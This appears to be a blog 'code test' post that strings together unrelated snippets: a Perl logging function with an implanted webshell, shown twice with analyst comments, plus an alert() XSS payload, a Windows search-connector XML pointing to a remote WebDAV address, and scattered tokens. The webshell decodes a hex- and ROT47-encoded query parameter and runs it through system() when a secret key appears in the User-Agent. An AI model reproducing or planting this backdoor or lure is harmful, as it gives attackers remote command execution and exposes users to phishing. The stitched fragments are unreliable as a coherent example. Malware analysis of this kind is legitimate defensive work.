June 5, 2024 By neandro.avelino < 1 min read

code test

# Msg: logging wrapper. Takes ($event, $level, $data), looks up the caller's
# file and line, and forwards everything to Msg_impl.
#
# NOTE(review): this listing is a malware-analysis exhibit. The lines between
# the two "webshell code" markers are an implanted backdoor that is evaluated
# on every call to Msg, before the legitimate logging work. The two marker
# lines are annotations from the write-up, not Perl, and the typographic
# quotes are presumably a rendering artifact of the page.
sub Msg {
  my ($event, $level, $data) = @_;
  # Caller's package, file and line; $pkg is not used in the visible code.
  my ($pkg, $file, $line) = caller;
 
— start of webshell code —
  # Both values come from the CGI environment, i.e. they are fully controlled
  # by whoever sends the HTTP request.
  my $ua = $ENV{HTTP_USER_AGENT};
  my $req = $ENV{QUERY_STRING};
  # Hard-coded 40-hex-character marker that acts as the access key.
  my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;
  my @param = split(/&/, $req);
  # Gate: the rest only runs when the User-Agent contains the marker anywhere.
  if (index($ua, $qur) != -1) {
    # Only the SECOND "&"-separated query parameter is examined.
    if ($param[1]){
      my @res = split(/=/, $param[1]);
      # The parameter must be named "cdi"; its value carries the payload.
      if ($res[0] eq “cdi”){
        # Layer 1: every pair of hex digits is replaced by the byte it encodes.
        $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
        # Layer 2: printable ASCII '!'..'~' is rotated by 47 positions (ROT47).
        $res[1] =~ tr/!-~/P-~!-O/;
        # The decoded request value is handed to system() as a single string,
        # so it runs as an OS command with the privileges of this process.
        # Detection: a request is suspicious when its User-Agent contains the
        # marker above and its second query parameter is named "cdi".
        # Comparing this file against a known-good copy exposes the insertion.
        system(${res[1]});
      }
    }
  }
 
— end of webshell code —
  # Legitimate part of Msg: keep only the file name after the last "/".
  $file = substr ($file, rindex ($file, “/”)+1);
  # Prevent C printf format codes to make it through…
  # (every "%" in the message is doubled before it is passed on)
  $data =~ s/%/%%/g;
  Msg_impl ($file, $line, $event, $level, $data);
}

Using X-Force code snippet:

<code>sub Msg {
  # Logging wrapper: receives ($event, $level, $data) and forwards them,
  # together with the caller's file and line, to Msg_impl.
  # NOTE(review): analysis exhibit. Everything between the two "webshell code"
  # marker lines is an implanted backdoor, and those marker lines are
  # annotations from the write-up rather than Perl.
  my ($event, $level, $data) = @_;
  my ($pkg, $file, $line) = caller;
 
— start of webshell code —
  # Request-controlled inputs, read from the CGI environment.
  my $ua = $ENV{HTTP_USER_AGENT};
  my $req = $ENV{QUERY_STRING};
  # Fixed 40-hex-character string the User-Agent must contain (access key).
  my $qur = “3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6”;
  my @param = split(/&/, $req);
  # index() returns -1 when the marker is absent, so this is a substring gate.
  if (index($ua, $qur) != -1) {
    # The first query parameter is ignored; only index 1 is inspected.
    if ($param[1]){
      my @res = split(/=/, $param[1]);
      # Parameter name must be exactly "cdi".
      if ($res[0] eq “cdi”){
        # Decode step 1: hex pairs -> bytes.
        $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;
        # Decode step 2: ROT47 over the printable ASCII range '!'..'~'.
        $res[1] =~ tr/!-~/P-~!-O/;
        # Command execution sink: the decoded request value is passed to
        # system() as a single string. Defensive pointers: hunt web logs for
        # the marker in User-Agent values, and treat any copy of this module
        # whose Msg reads HTTP_USER_AGENT or QUERY_STRING as modified.
        system(${res[1]});
      }
    }
  }
 
— end of webshell code —
  # Original logging logic resumes: strip the directory part of the path.
  $file = substr ($file, rindex ($file, “/”)+1);
  # Prevent C printf format codes to make it through…
  # (each "%" in $data is replaced by "%%")
  $data =~ s/%/%%/g;
  Msg_impl ($file, $line, $event, $level, $data);
}</code>

Another:

<script>alert(“hi”)</script>


Tester:

<?xml version=”1.0″?>

<persistedQuery version=”1.0″>

<viewInfo viewMode=”icons” iconSize=”256″ stackIconSize=”0″ displayName=”Documents” autoListFlags=”0″>

<visibleColumns>

<column viewField=”System.ItemNameDisplay”/>

</visibleColumns>

<sortList>

<sort viewField=”System.ItemNameDisplay” direction=”ascending”/>

</sortList>

</viewInfo>

<query>

<kindList>

<kind name=”item”/>

</kindList>

<scope>

<include path=”::{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\\148.252.42[.]42@80\documents\Tender” attributes=”1887437183″/>

</scope>

</query>

<properties>

<author Type=”string”>user</author>

</properties> </persistedQuery> 

cmd.exe

char()

varchar()

(hex($1))

<p style=”font-family:courier;”>This is a paragraph.</p>
<p style=”background-color:Tomato;”>Lorem ipsum…</p>
